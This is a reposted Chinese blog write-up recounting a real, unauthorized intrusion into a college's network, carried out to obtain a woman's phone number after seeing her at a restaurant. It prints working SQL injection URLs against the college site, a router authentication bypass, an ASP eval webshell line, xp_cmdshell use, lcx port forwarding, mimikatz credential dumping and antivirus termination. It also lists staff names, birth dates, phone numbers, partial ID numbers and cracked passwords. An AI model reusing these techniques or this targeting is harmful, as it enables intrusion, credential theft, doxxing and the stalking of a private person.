白衫红裙妹子引发的内网被撸穿的血案《转》

网站建设评论44

某日路过地沟油一条街如意冒菜店,看到一白衫红裙妹子,这让我内心泛起涟漪,都走过冒菜店一段距离后的我又折回来吃了一碗冒菜。第二天去店里做了兼职,跟她同学聊天后得知了他们的专业和班级,但当她同学得知我的意图后死不给我她电话,没办法,就转向她们的学校吧。

对目标系统进行端口扫描

nmap -v *.*.9.***

对开放的端口挨个访问,列出端口开放的服务。

Scanned at 2015-05-28 22:14:52 中国标准时间 for 55sNot shown: 987 filtered portsPORT     STATE  SERVICE21/tcp   open   ftp80/tcp   open   http843/tcp  closed unknown1433/tcp closed ms-sql-s1723/tcp open   pptp2323/tcp open   3d-nfsd //交换机telnet3690/tcp open   svn     //https://*.*.9.***:3690/svn/7001/tcp open   afs3-callback  //https://*.*.9.***:7001/有问题8000/tcp open   http-alt     //****学院数字化校园管理系统安装8001/tcp open   vcom-tunnel8002/tcp open   teradataordbms  //Apache Tomcat8081/tcp open   blackice-icecap  http://*.*.9.***:8081/(22***45jtt***ctnh45)/Default2.aspx方正教务系统8088/tcp open   radan-http  //h3c交换机

http:// *.*.9.***:8088/userLogin.asp

ER3260系统管理

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

而h3cer系列路由器身份验证绕过漏洞(详细内容请见:http://www.nsfocus.net/vulndb/17106),访问地址 http://www.*****.edu.cn:8088/maintain_basic.asp?userLogin.asp可直接查看配置信息,利 用此漏洞我们得知了网络大概拓扑结构,并导出了ARP绑定表。

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(ARP绑定表)

获得信息:

下载ARP绑定表cfg,知道校内哪些重要服务器。管理员常常会在交换机或者路由器上做MAC地址绑定防止ARP攻击,通过ARP绑定表我们可获知哪些是重要服务器或设备。下载全局配置文件cfg,获取整个路由配置信息(路由器登陆密码无法解密),当然更暴力点也可以使用其他已知路由器加密密码替换目标配置文件加密密码,然后导入配置文件来重置目标密码。网络双线接入此路由器,然后在路由器上做端口转发来分别访问内网不同服务器。

其他端口信息

8000简单的文件共享,提供校内师生下载工作软件使用。

http://*.*.9.150:8000/net/

publish.htm 数字化校园安装

App.zip 数字化校园2013-7-2演示版

net/oa.zip OA系统

net/p1108.rar HP1108驱动

8002 一个tomcat服务器,删除了管理功能。

3690  SVN服务器,网页认证未发现弱口令。

8081 方正系统。

21   FTP无法访问。

社工信息

之后卡了一阵子,尝试搜集社工信息。

域名信息,域名在http://www.35.com,注册人shulijuan,加QQ资料姓名舒丽娟。以QQ邮箱584273499@qq.com再次收索,发现很多域名在其名下,此人估计是个域名注册商之类的人,暂时放弃收集他的资料。

Registrant Name:zeng xia***Registrant Organization:weisheng xue***Registrant Street:huidong fangchongRegistrant Fax:+86.813210***Registrant Fax Ext:Registrant Email:58427***@qq.comAdmin Name:shulijuanDomain Name: *****.com (域名)Registrar WHOIS Server: whois.35.comRegistrar URL: http://www.35.com

根据主站上搜集到的邮箱hchp***@126.com进行收索,找到文档“促进中职卫生类藏区“9%2B3”学生学习***.doc”,“2014年职业教育***推荐书”文档包含了邮箱使用者信息和其他老师信息,不过未找到身份证号码。

整理信息:

姓名性别出生年月现任党政职务从事工作电话邮箱邓XX女1978-07学生管理处处长、团委书记学生管理、共青团工作1390XXXX385834XXX4@qq.com蒲XX女1973-05教务副处长专业教学及教学管理138900XXX3361XXX027@qq.com黄XX男1973-01副院长思想政治教育13890077116hchXXX6@126.com罗XX女1965-06副院长教育管理、专业教学138900XXXZg9XX@126.com秦XX女1981-11无实践教学及成人教育管理、教学质控136190XXX36189XXX@qq.com

接着根据手机号码13890XX6找到一个2011112XXX51-253549.25第二十六期.xls缴费表,里面找到一个身份证号 黄禄琪510*************1436,但不是目标的。

尝试攻击:

社工库搜索hchXXX@126.com邮箱信息,未找到。尝试邮箱弱口令(hcpXXX,hcpXX,hchpXXX等),未成功。尝试126的找回密码功能,3次错误被锁定。

注册伪装邮箱hchpXXXX@126.com进行邮件欺骗(MD没免杀马啊)。

最后再转向主站

主站存在SQL注入漏洞,尝试获取基本信息。

http://www.*****.edu.cn/Board/RecruitStudents.aspx?InformationID=3341&BoardID=21
-D InformationRelease -T lqcx -C JTDZ,KB,KSH,LQZY,MARK,SFZH,TDCJ,XBDM,XM –dump --delay 3ype: UNION query    Title: Generic UNION query (NULL) - 5 columnsPayload: InformationID=-2687\' UNION ALL SELECT 12,CHAR(113)+CHAR(122)+CHAR(120)+CHAR(118)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(108)+CHAR(101)+CHAR(82)+CHAR(102)+CHAR(76)+CHAR(101)+CHAR(112)+CHAR(75)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(107)+CHAR(113),12,12,12-- &BoardID=21Database: InformationRelease[15 tables]+--------------------------------------------+| AnswerOnLine      //回答问题的                         || BoardID          //板块名                          || DownloadCenter      //下载中心                       || HeadNews            //头条新闻                       || Information           //文章信息                     || Operator             //唯一一个像管理表的                      || OperatorRight         //管理权限                     || PublicTotal            //访问统计                    || QuestionOnLine        //提问                     || SCL_90_Verdict                             || SCL_90_Verdict                             || dtproperties                               || lqcx                                       || sysconstraints                             || syssegments                                |+--------------------------------------------+

网站访问量过多或是访问速度一大就崩溃,使用–delay 3延时访问,但数据库跑几分钟网站仍然挂掉,使用–os-shell参数网站直接挂掉,没办法只有手动注入。

判断字段是数字还是字符

http://www.*****.edu.cn/Board/RecruitStudents.aspx?InformationID=-5653\' UNION ALL SELECT 56,CHAR(113)+CHAR(122)+CHAR(106)+CHAR(112)+CHAR(113)+(CASE WHEN (HOST_NAME()=HOST_NAME()) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113),56,56,56-- &BoardID=21
\'title\',\'content\',time(), \'来源\', \'阅读次数\'

获取@@version信息

http://www.*****.edu.cn/Board/RecruitStudents.aspx?InformationID=-5653%27%20UNION%20ALL%20SELECT%20@@version%2CCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28HOST_NAME%28%29%3DHOST_NAME%28%29%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29%2C56%2C56%2C56--%20&BoardID=21

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

获取数据库名

http://www.*****.edu.cn/Board/RecruitStudents.aspx?InformationID=-5653%27%20UNION%20ALL%20SELECT%20name,%2712%27,56,56,56%20from%20master..sysdatabases--%20&BoardID=21

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

枚举数据库

http://www.*****.edu.cn/Board/RecruitStudents.aspx?InformationID=-5653%27%20UNION%20ALL%20SELECT%20TOP%201%20name,%2712%27,56,56,56%20from%20master..sysdatabases%20WHERE%20name%20not%20in%20%28SELECT%20TOP%201%20name%20from%20master..sysdatabases%29--%20&BoardID=21

system_user 当前用户

http://www.*****.edu.cn/Board/RecruitStudents.aspx?InformationID=3341%27%20and%20SYSTEM_USER=%27scz***&BoardID=21

sczg***

开启了混合验证windows和sa

http://www.*****.edu.cn/Board/RecruitStudents.aspx?InformationID=3341%27+and+0=%28select%20SERVERPROPERTY%280x4973496E746567726174656453656375726974794F6E6C79%29%29%20and%201=%271&BoardID=21

读取sa密码乱码(最后才知道数据库保存的是二进制的数据)

http://www.*****.edu.cn/Board/RecruitStudents.aspx?InformationID=-5653%27%20UNION%20ALL%20SELECT%20password,%2712%27,56,56,56%20from%20master.dbo.sysxlogins%20where%20name%20=%20%27sa%27--%20&BoardID=21

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

是sysadmin权限

select IS_SRVROLEMEMBER(\'sysadmin\')
http://www.*****.edu.cn/Board/RecruitStudents.aspx?InformationID=3341%27+and+1=%28select%20IS_SRVROLEMEMBER%28%27sysadmin%27%29%29+and%201=%271&BoardID=21

判断xp_cmdshell是否存在

http://www.*****.edu.cn/Board/RecruitStudents.aspx?InformationID=3341%27+and+1=%28select%20count%28*%29%20from%20master.dbo.sysobjects%20where%20name%20=%20%27xp_cmdshell%27%29+and%201=%271&BoardID=21

建立cmd表(无法建立)

http://www.*****.edu.cn/Board/RecruitStudents.aspx?InformationID=3341\';create+table+cmd+(a image)--&BoardID=21

获得信息:

1.当前数据库InformationRelease(DB_NAME())。2.当前账户scz***。3.xp_cmdshell可用。4.开启混合验证。5.数据库主机名ZGWX-PA***(@@servername)。6.Operator表跑出的内容无法登陆网站后台,但是可以写入数据进去。7.当前账户是sysadmin权限。8.无法建立表(不是sysadmin权限么,为毛不能建立呢),无法将xp_cmdshell执行结果写入表中,尝试其他方法查看命令执行回显(OPENROWSET写入远程数据库)。读取账户hash失败。

本地测试OPENROWSET

将本地的用户表写入远程数据库test strs表中(执行成功)。

Insert into openrowset(\'SQLOLEDB\',\'Network=DBMSSCON;Address=192.168.1.***;uid=sa;pwd=123456\',\'select * from test.dbo.strs\') select name from sysobjects where xtype =\'U\'

测试命令执行(失败)。

insert into openrowset(\'SQLOLEDB\',\'Network=DBMSSCON;Address=192.168.1.***;uid=sa;pwd=123456\',\'select * from test.dbo.strs\') exec master..xp_cmdshell \'dir c:\'

错误1,服务器 ‘WWW-8A691A6C*** 上的 MSDTC 不可用。

解决方法:服务–>Distributed Transaction Coordinator–>属性–>启动

错误2,该操作未能执行,因为 OLE DB 提供程序 ‘SQLOLEDB’ 无法启动分布式事务。

[OLE/DB provider returned message: 新事务不能登记到指定的事务处理器中。 ]

解决方法:未能解决

在寻找解决方法的时候无意指定了远程数据库,竟然提示登陆失败,表示数据库可以远程连接,然后没报多少希望的测试弱口令,发现密码scz***竟然 登陆成功(能想到这个密码也是先前读取的数据库用户名是这个)。第一次的端口扫描显示1433端口是关闭的,不过最近管理员可能为了方便远程管理而临时打 开了,端口开放情况有改变(很多时候管理员会做一些新的配置,开放一些新的端口或者测试服务,这时候往往会是APT的突破点)。

mssql管理工具连接数据库

开启xp_cmdshell

查看IP

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(xp_cmdshell执行命令)

Windows IP ConfigurationPPP adapter RAS Server (Dial In) Interface:Connection-specific DNS Suffix  . :IP Address. . . . . . . . . . . . : 172.168.***.1Subnet Mask . . . . . . . . . . . : 255.255.255.255Default Gateway . . . . . . . . . :Ethernet adapter 本地连接:Connection-specific DNS Suffix  . :IP Address. . . . . . . . . . . . : 122.122.***.***Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 122.122.***.1Ethernet adapter 本地连接 2:Media State . . . . . . . . . . . : Media disconnected

查看用户信息

net user

\\ 的用户帐户-------------------------------------------------------------------------------90141                    Administrator            ASPNETGuest                    IUSR_ZGWX-SZMO           IWAM_ZGWX-SZMOSQLDebugger              SUPPORT_388945a0         test命令运行完毕,但发生一个或多个错误。查看用户密码SELECT name,password FROM master.dbo.sysxlogins

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(select 用户hash)

http://www.cmd5.com解密出

login/1

hsmisLogin/1

在本机数据库里找了半天,没有发现我们要找的妹子的信息,考虑本机的数据库内容可能不是最新的。

之后打算上传webshell,不过使用sqlttols自带的上传始终未成功。之后使用

echo \"<%eval request(\"a\") %>\" > d:web1.asp

方式写马发现网页无法找到,多次尝试后猜测主站不再此此服务器上。

其他尝试(尼玛,下面方法都还未成功,可以直接忽略。):

1.远程架设TFTP服务器,使用TFTP -i ip get 1.txt,但总是连接超时。2.FTP自动下载脚本。3.数据库备份写webshell。4.vbs下载者。

最后苦逼地浏览数据库每个表(体力活),找到一个用户最后登录时间记录表,里面竟然有登陆用户的密码(我勒个去),用此密码可以登录协同管理系统,最后找到妹子电话号码。

数字化校园管理系统

http://*.*.9.***:8001/ECM/login.html;jsessionid=457C92FF06B513108D9B750090BE83D9

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(协同管理界面)

第二天小伙伴翻看了磁盘内的所有文件(重要的是网站目录下的数据连接文件,体力活啊),找到一些数据库配置信息,包括口令和数据库服务器IP。然后小伙伴用作晚的管理密码登录后台查看,在邮件上传的地方成功上传webshell。

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(后台邮件上传)

在mssql中直接建立管理员账号(如果是webshell就用漏洞提权工具,比如MS11_46.exe),lcx反弹远程3389端口,登陆桌面getpass获得管理员密码,清除建立的账号。

在这里有一个细节,登陆服务器查看了远程桌面连接历史记录,挨个尝试登陆(有时管理员为了方便会将登陆信息保存),在登陆234机子时显示的登录名 是\\PC-532HB532***,这里可以猜测管理员用户名可能是532***(其他用户几乎都是adminisrator,只有管理员会操作服务 器)。

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

获得的信息:

mssql:sa/scz***(通杀)

mstsc:administrator/windows

入侵数据库服务器

IP:122.122.***.***

使用windwos密码无法登陆(很多时候管理员记不住那么多密码,很可能将自己维护的许多机子设置成同一个密码,当我们获得一个密码后可以大胆的发挥你的想象力了)。

最后继续翻看了***服务器,打开mssql管理器,里面保存了183服务器的连接信息,不过查询管理器是普通用户登陆的,密码是1(其实可以用 MSSqlPass.exe工具读取密码)。在企业管理器里将login提权(加入sysadmin组),然后执行建立账号命令。远程桌面连入执行 dump密码操作各种出错,最后是用procdump+mimikatz获取到administrator密码。其实当时没考虑到杀软的影 响,mimilib.dll被360杀毒拦截,本地账号taskkill结束360会权限不够,我们使用233服务器远程连接183MS数据 库 xp_cmdshel执行taskkill命令成功结束360进程(360sd被MS干掉咯)。

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(mssql2000企业管理器)

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(修改login账户权限)

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(MSSqlPass.exe读取密码)

获得的信息:

数据中心服务器Data-center

122.122.***.***:3389

SQLDebugger/ruo@123.  //后门密码

Administrator/windowsweb  //procdump+mimikatz获取

MSSQL:2433

login/1

sa/admin

远程备份数据库下载回来导入本地

1,备份数据库

–备份数据库HealthSchoolMIS到D:Hs.bak

BACKUP DATABASE HealthSchoolMISTO DISK = \'D:Hs.bak\'

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(sqltool连接数据库执行备份)

2,建立数据库HealthSchoolMIS,也可以任意名字,后面使用WITH REPLACE 在现有数据库上强制还原。

–返回由备份集内包含的数据库和日志文件列表组成的结果集

RESTORE FILELISTONLYFROM DISK = \' D:Hs.bak \'

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(日志信息)

3,还原

–指定还原后的数据库物理文件名称及路径

RESTORE DATABASE HealthSchoolMISFROM DISK  = \'D:Hs.bak\'WITH REPLACE,MOVE \'***SchoolMIS_Data\' TO \'D:DATA***SchoolMIS_Data.MDF\',MOVE \'***SchoolMIS_Log\' TO \'D:DATA***SchoolMIS_Log.LDF\',MOVE \'***SchoolMIS_1_Log\' TO \'D:DATA***_user_log\'

其他

Oracle 11g

zfxfzb/zfxfzb //权限未知

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(orcale管理界面)

渗透其他服务器

可能管理员后期做了其他配置,致使端口开发情况改变,对目标IP重新扫描。

net view服务器名称            注释-------------------------------------------------------------------------------\\CWKY-JXZY      //教学资源                                                              \\CWKYTSG                                                                      \\DATA-CENTRE    //数据中心183                                                              \\FH08951-10                                                                   \\FH09230-3                                                                    \\LYW                                                                          \\PC-201302051148                                                              \\PC-20130831BYYB                                                              \\PC-532CL    //lc?                                                                 \\PC-532HB    //黄***                                                                 \\PC-创建04                                                                    \\PC-曾院长                                                                    \\PC201405301536                                                               \\PC201410301107                                                               \\PC201412161432                                                               \\PC65                                                                         \\SERVER                                                                       \\SERVER1                                                                      \\TEACHER-PC                                                                   \\USER-20150120YM                                                              \\V5470-PC                                                                     \\WIN-SJV5WQA99TS                                                              \\WINAHEXL                                                                     \\XP-201110101109                                                              \\ZGWX-PA5PZ     //网站数据库机子                                                              \\ZGWX-SZMO     //233 ECM                                                               \\ZGWX41702                                                                    \\只能输七个字哟

命令成功完成。

主要服务器

00:E0:FC:10:4E:79 122.122.***.*** ***医院专线00:1B:78:37:D6:3E 122.122.***.*** 数据中心服务器 //V00:25:9E:03:E4:5D 221.10.***.*** 联通网关E8:39:35:3E:2F:FA 122.122.***.*** 学院收费服务器00:1B:21:05:D8:77 122.122.***.*** 学院官网      //目标(已拿下)00:1B:B9:F5:A9:D9 122.122.***.***18:A9:05:77:25:44 122.122.***.*** 视频点播系统6C:62:6D:79:1D:89 122.122.***.*** 罗校长      //可能是 罗***00:26:55:39:81:61 122.122.***.***4C:09:B4:F1:06:80 118.119.***.*** 电信网关1C:FA:68:3D:52:87 122.122.***.*** ***路由器D4:85:64:9D:50:8A 122.122.***.*** 魏***       //未知40:16:9F:E8:53:08 122.122.***.*** 综合办B4:B5:2F:51:01:BB 122.122.***.*** 图书馆服务器    //图书馆D8:9D:67:2B:5B:5A 122.122.***.*** 教学资源服务器  //WEBSHELLC0:61:18:BB:54:EB 122.122.***.*** router-532   //tp-link00:1B:B9:F5:A9:8D 122.122.***.*** 学工部126打印机78:AC:C0:FC:F7:4E 122.122.***.*** 学院数据库服务器 //V00:26:55:39:47:45 122.122.***.*** 宋***老师C8:3A:35:88:6C:94 122.122.***.*** 党委办路由器34:64:A9:0B:29:FF 122.122.***.*** 黄校长             //应该是黄***2C:44:FD:94:B0:B1 122.122.***.*** 数据上报平台服务器D0:C7:C0:B2:FD:B5 122.122.***.*** A140-Router  //tp-link40:61:86:F5:F4:AA 122.122.***.*** 一哥78:E3:B5:A1:00:B7 122.122.***.*** 学管127路由D8:15:0D:86:FD:53 122.122.***.*** 李***office-route50:46:5D:64:9E:76 122.122.***.*** 视频巡考  //无法访问70:F9:6D:AD:0B:2D 122.122.***.*** Teach-router00:40:48:B2:EF:5C 122.122.***.*** 视频巡考 admin/123458C:E7:48:0C:88:8A 122.122.***.*** 视频巡考 admin/123458C:E7:48:0C:88:99 122.122.***.*** 视频巡考 admin/123458C:E7:48:0C:88:B9 122.122.***.*** 视频巡考 admin/123458C:E7:48:0C:88:BB 122.122.***.*** 视频巡考 admin/12345C8:3A:35:1B:02:C0 122.122.***.*** A317-RouterA0:D3:C1:42:FA:E5 122.122.***.*** PC-532  //网管机B4:B5:2F:C4:D8:4D 122.122.***.*** 视频巡考网管  //网管机00:50:C2:23:7C:3A 122.122.***.*** 视频巡考SIP //重要2C:44:FD:94:AF:D4 122.122.***.***D8:15:0D:87:0E:FD 122.122.***.*** 教务处路由D8:42:AC:24:81:3F 122.122.***.***00:02:55:53:EE:8E 122.122.***.*** 人机对话临时00:1A:4B:ED:9A:3B 122.122.***.*** 工资查询118C:E7:48:75:3E:F4 122.122.***.***EC:88:8F:7D:4E:F1 122.122.***.***搜索Employee表找到黄***身份证号510212******701(格式有误),出生日期1/12/1***。罗天蔚 5102***5***1456,5/21/1965VIRTUALSERVER_ENTRY3=0;9901;9905;9901;9905;122.122.***.***;0;标准化考场巡考系统VIRTUALSERVER_ENTRY4=0;21;23;21;23;122.122.***.***;0;标准化考场巡考系统 //telnetVIRTUALSERVER_ENTRY6=0;3306;3306;3306;3306;122.122.***.***;0;标准化考场巡考系统 //mysqlVIRTUALSERVER_ENTRY7=0;80;80;80;80;122.122.***.***;7;WEB //主站VIRTUALSERVER_ENTRY8=0;8001;8001;8080;8080;122.122.***.***;0;数字化校园 //已拿下VIRTUALSERVER_ENTRY9=0;5000;5000;3389;3389;122.122.***.***;0;网站服务器 //rdp 5000VIRTUALSERVER_ENTRY10=0;8000;8000;80;80;122.122.***.***;0;数字化校园服务器VIRTUALSERVER_ENTRY11=0;3690;3690;3690;3690;122.122.***.***;0;数字化校园服务器SVNVIRTUALSERVER_ENTRY12=0;1433;1433;1433;1433;122.122.***.***;0;数字化校园服务器SQLVIRTUALSERVER_ENTRY14=0;8080;8080;80;80;122.122.***.***;0;教学资源平台 //已拿下VIRTUALSERVER_ENTRY15=0;50000;50000;50000;50000;122.122.***.***;0;唐 //未知VIRTUALSERVER_ENTRY16=0;285;285;3389;3389;122.122.***.***;0;高  //未知VIRTUALSERVER_ENTRY19=0;8002;8002;8080;8080;122.122.***.***;0;183服务器 //已拿下VIRTUALSERVER_ENTRY5=0;8081;8081;8081;8081;122.122.***.***;0;选课系统VIRTUALSERVER_ENTRY17=0;1723;1723;1723;1723;122.122.***.***;0;vpnVIRTUALSERVER_ENTRY18=0;650;650;3389;3389;122.122.***.***;0;hb //网管hb机rdp 650VIRTUALSERVER_ENTRY20=0;7001;7001;3389;3389;122.122.***.***;0;临时 //26 rdp 7001用户名应该是532HBVIRTUALSERVER_ENTRY2=0;33891;33891;3389;3389;122.122.***.***;0;临时 //未知

部分日志

2015-05-28 08:33:44 [Informational] : UPNP添加端口映射 843 TCP 843 122.122.***.***。2015-05-28 08:35:52 [Informational] : UPNP添加端口映射 843 TCP 843 122.122.***.***。2015-05-28 08:36:23 [Notice] : 用户admin(122.122.***.***)超时。2015-05-28 08:36:23 [Informational] : 用户admin从122.122.***.***登录。//确定网管机2015-05-28 08:37:01 [Informational] : UPNP添加端口映射 843 TCP 843 122.122.***.***。2015-05-28 08:38:42 [Informational] : UPNP添加端口映射 843 TCP 843 122.122.***.***。2015-05-28 08:40:55 [Informational] : UPNP添加端口映射 843 TCP 843 122.122.***.***。2015-05-28 08:42:01 [Informational] : UPNP添加端口映射 843 TCP 843 122.122.***.***。2015-05-28 08:43:41 [Informational] : UPNP添加端口映射 843 TCP 843 122.122.***.***。2015-05-28 08:45:52 [Informational] : UPNP添加端口映射 843 TCP 843 122.122.***.***。2015-05-28 08:47:02 [Informational] : UPNP添加端口映射 843 TCP 843 122.122.***.***。2015-05-28 08:48:07 [Warning] : 来自于地址122.122.***.***的用户名或者密码错误。2015-05-28 08:48:14 [Notice] : 用户admin(122.122.***.***)超时。2015-05-28 08:48:14 [Informational] : 用户admin从122.122.***.***登录。2015-05-28 08:48:44 [Informational] : UPNP添加端口映射 843 TCP 843 122.122.***.***。

目标1:尝试拿下管理员机子

收集密码

    数据库网站登陆数据库社工

查看HealthSchoolMIS数据库时MEM_GENINF表显示了类似base64加密后的密码字段,不过base64解密后乱码,也没有 找到老师登陆信息,于是下载了ECM整个网站文件,查看连接字符串后发现使用的还是183的orcale数据库,orcale保存的是最新数据应该是无疑 了。

从代码中查找信息:

    老师和学生登陆判断所使用的表,这样可以直接DUMP此表。密码加密方式,可以解密加密后的密码。

导出orcale数据库

Lcx反弹内网183 1521端口,本地Navicat Premium查看数据库。

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

密码加密方式:

public static String EncoderByMd5(String str)        throws NoSuchAlgorithmException, UnsupportedEncodingException    {        MessageDigest md5 = MessageDigest.getInstance(\"MD5\");        BASE64Encoder base64en = new BASE64Encoder();        byte tmpStr[] = md5.digest(str.getBytes(\"utf-8\"));        String newstr = base64en.encode(md5.digest(str.getBytes(\"utf-8\")));        return newstr;    }

这是java MD5的实现,开始以为是base64,研究了半天,后来发现可以在http://www.cmd5.com/网站直接解密常见弱口令。

ISMvKXpXpadDiUoOSoAfww== à admin

在查看employee_login表时看到密码qd,猜测可能是个用户名,然后查看前面收集到的资料只有名字秦丹最匹配,用此密码登录邮箱成功。

获得信息:

秦 丹 3618****@qq.com 90***/ ********qd(密码可登陆邮箱)。

前面确定了网管机和网管拼音简写,后面开始收集网关信息,猜测rdp弱口令。

确定网络管理员名字为hb,(\\PC-532HB532HB)

雇员表数据库有两个拼音类似,其实开始没看到有两个,以为网管名叫黄博,结果找了半天没找到多少有用的信息,后来再看employee表才看到还有一个名字。

55780(Em_id) 黄博 51****19811103****,11/3/1981

90121黄波51****19821220****,12/20/1982,1399007****,学校在编在岗

employee_login表90***最后登陆密码为Huangbo****

登陆秦丹邮箱查看QQ联系人,猜测hbQQ号码

(可能邮箱”黄波”<39830****@qq.com>;”黄波”<36043****@qq.com>;)

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

 

接着我们登陆教学资源网站数据库模糊找

SELECT *FROM `hq_user`WHERE compellation LIKE \'%黄%\'

最后通过lastloginip字段122.122.***.***(这是网管机)值判断网关真名叫黄波。

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

黄波,男,1186e041de1552cc***17d014caa47(解密hungbo_***),39830****@qq.com,1399007****

Hydral跑弱口令

目标2:尝试主站

主站

\\ZGWX-PA***     //网站数据库机子

ping ZGWX-PA*** 返回122.122.***.***地址,判断站库未分离。

根据233 D盘目录猜测网站可能路径,然后使用注入点写webshell。

D:healthSchoolMISD:webD:webHsMisD:webHsMisBD:MIS_Web

MD说好的晚上猜目录写shell,结果网站奔溃了一晚上都没好。

于是乎只有考虑通过远程数据库写shell,不过数据库密码不通用了,我们只有反编译主站dll从中寻找数据库连接字符串了。我们从233网站D盘备份目录导出网站dll文件反编译,dll文件比较多找了半天才找到是哪个dll。

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(.NET Reflector反编译DLL)

连接字符串:

static DBConection(){    InformationRelease = new DBF(\"127.0.0.1\", \"2433\", \"InformationRelease\", \"***ghs\", \"healthsch***\");    InformationMIS = new DBF(\"127.0.0.1\", \"2433\", \"HealthSchoolMIS\", \"***ghs\", \"healthsch***\");}

通过233远程连接230,查看D盘目录结构,判断网站目录位置,xp_cmdshell写webshell(其实网站结构和我们预估的结构类似,通过网站注入写webshell应该也没问题,不过还要考虑是否有写入权限,通常我会写到图片或文件上传目录和编辑器目录)。

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

菜刀连接

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

minidump导出密码

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

获得信息:

Administrator/windowsweb1

目标3:监控机

Arp绑定表显示了监控机的IP,浏览器访问直接跳到登陆地址,baidu搜索url关键字,发现是**监控系统,然后baidu默认密码(系统都未修改默认密码)。

http://122.122.***.***/doc/page/login.asp

admin/12345

后记

后期翻看了管理系统代码,找到登陆所使用的表,不过在orcale库中没找到对应的表,应为不熟悉java,有点蛋疼,3000多个表就没细看了。

白衫红裙妹子引发的内网被撸穿的血案《转》-开水网络

(jd反编译class)

内网其他机子,最后上hscan扫描弱口令,种马之类的就不说了。本次渗透前期收集了一些有用无用的信息,突破点在mssql口令。进入系统后可以 查看用户操作历史记录,读取系统软件缓存密码进一步渗透。不过遗憾的事没有拿下网管机,键盘记录器工作也不太正常,但想要的信息拿到了,没有比这个更重要 的了,不是么?

[via@若 / Mr.X]

 
网站建设

“万蓝”ROM级手机木马分析报告

今年五月中旬,有用户向360安全中心反馈手机经常自动安装新的游戏应用,经过360互联网安全中心分析排查发现用户中的是一个ROM级别的木马。该木马主要通过获取云端指令进行静默安装推广应用,并可以实现自身...
企业网站应该什么时候去建设? 网站建设

企业网站应该什么时候去建设?

企业网站什么时候开始建设网站建设并不是在公司有一定规模才开始着手这件事情,而是注册公司的时候就要着手做了。一般中小企业会找专门建站公司来做企业官网,怎么选择专业建站公司?网站建设是一门技术活 千万不要...
手把手教你一小时学会搭建网站 网站建设

手把手教你一小时学会搭建网站

  点击确定之后,会进行解压,解压完成后会弹出防止重复化提示,这里我们选择“是”即可。  3、运行。之后桌面会弹出软件运行的控制面板,我们可以看到软件已经启动起来了,包括它此时的启动状态。3如何在自己...
匿名

发表评论

匿名网友
:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: